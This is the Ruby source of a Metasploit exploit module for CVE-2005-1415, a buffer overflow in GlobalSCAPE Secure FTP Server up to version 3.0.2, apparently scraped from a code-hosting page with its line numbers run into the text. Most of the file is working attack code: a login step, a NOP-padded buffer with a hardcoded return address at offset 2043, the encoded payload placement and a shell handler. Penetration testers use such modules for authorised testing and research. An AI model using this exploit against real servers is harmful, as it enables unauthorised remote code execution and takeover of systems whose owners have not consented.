Path: blob/master/modules/exploits/windows/ftp/globalscapeftp_input.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'GlobalSCAPE Secure FTP Server Input Overflow',15'Description' => %q{16This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.17All versions prior to 3.0.3 are affected by this flaw. A valid user account (18or anonymous access) is required for this exploit to work.19},20'Author' => [ 'Fairuzan Roslan <riaf[at]mysec.org>', 'Mati Aharoni <mati[at]see-security.com>' ],21'License' => BSD_LICENSE,22'References' => [23[ 'CVE', '2005-1415'],24[ 'OSVDB', '16049'],25[ 'BID', '13454'],26[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],27],28'Privileged' => false,29'Payload' => {30'Space' => 1000,31'BadChars' => "\x00\x20" + (0x61..0x7a).to_a.pack('C*'),32'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",33},34'Platform' => [ 'win' ],35'Targets' => [36[37'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',38{39'Ret' => 0x1002f01f,40},41],42],43'DisclosureDate' => '2005-05-01',44'DefaultTarget' => 0,45'Notes' => {46'Reliability' => UNKNOWN_RELIABILITY,47'Stability' => UNKNOWN_STABILITY,48'SideEffects' => UNKNOWN_SIDE_EFFECTS49}50)51)52end5354def exploit55c = connect_login56return if not c5758buf = make_nops(3047)59buf[2043, 4] = [ target.ret ].pack('V')60buf[2047, payload.encoded.length] = payload.encoded6162send_cmd([buf])6364handler65disconnect66end67end686970